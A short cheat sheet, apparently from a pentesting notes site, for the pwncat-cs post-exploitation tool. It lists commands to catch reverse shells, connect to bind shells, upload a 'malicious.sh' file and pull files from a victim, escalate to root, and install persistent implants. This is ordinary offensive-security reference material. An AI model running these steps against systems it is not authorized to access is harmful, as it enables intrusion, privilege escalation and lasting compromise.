Pwncat
Basic Usage
# general syntax
[protocol://][user[:password]]@[host:][port][?arg1=value&arg2=value]Catching a revershe shell.
# catching reverse shell (set up listener)
pwncat-cs bind://0.0.0.0:<port>
# nc syntax
pwncat-cs -lp <port>
# encrypting traffic
pwncat-cs ssl-bind://0.0.0.0:<port>Connecting to a bind shell.
# connecting to a bind shell
pwncat-cs connect://<ip:port>
# nc syntax
pwncat-cs <ip>:<port>
# encrypting traffic
pwncat-cs ssl-connect://<ip>:<port>Connecting to a remote SSH server.
# via ssh
pwncat-cs "ssh://<user>:<pass>@<ip>
# ssh syntax
pwncat-cs <user>@<ip>
# key auth
pwncat-cs -i ./id_rsa <user>@<ip>Connect to a Windows target.
# Full connection string
pwncat-cs -m windows connect://192.168.1.1:4444
# nc syntax
pwncat-cs -m windows 192.168.1.1 4444Switch between local and remote modes.
# CTRL+D
(local) pwncat$
# CTRL+D
(remote) www-data@p-web-02.acme-infinity-servers.com:/var/www/html$
# CTRL+D
(local) pwncat$File transfers.
# download a file
download /etc/hosts ./victim-hosts
# upload a file
upload ./malicious.sh /tmp/definitely-not-maliciousEnumeration
From local mode.
# search enumeration modules
(local) pwncat$ search enumerate*
# use all enumeration modules
(local) pwncat$ run enumerate
# generate a markdown report
(local) pwncat$ run report output=report.mdEoP
# list escalation paths for any user
(local) pwncat$ escalate list
# list escalation paths to the specified user
(local) pwncat$ escalate list -u <user>
# escalate to root
(local) pwncat$ escalate run
# escalate to the specified user
(local) pwncat$ escalate run -u <user>Persistence
# list implant methods
(local) pwncat$ search implant*
# list installed implants
(local) pwncat$ run implant list
# escalate using an installed implant
(local) pwncat$ run implant escalate
# remove implant
(local) pwncat$ run implant remove
# list all installed remote implants
pwncat-cs --list
# reconnect using the implanet ID
pwncat-cs <implant-id>Resources
Last updated
Was this helpful?
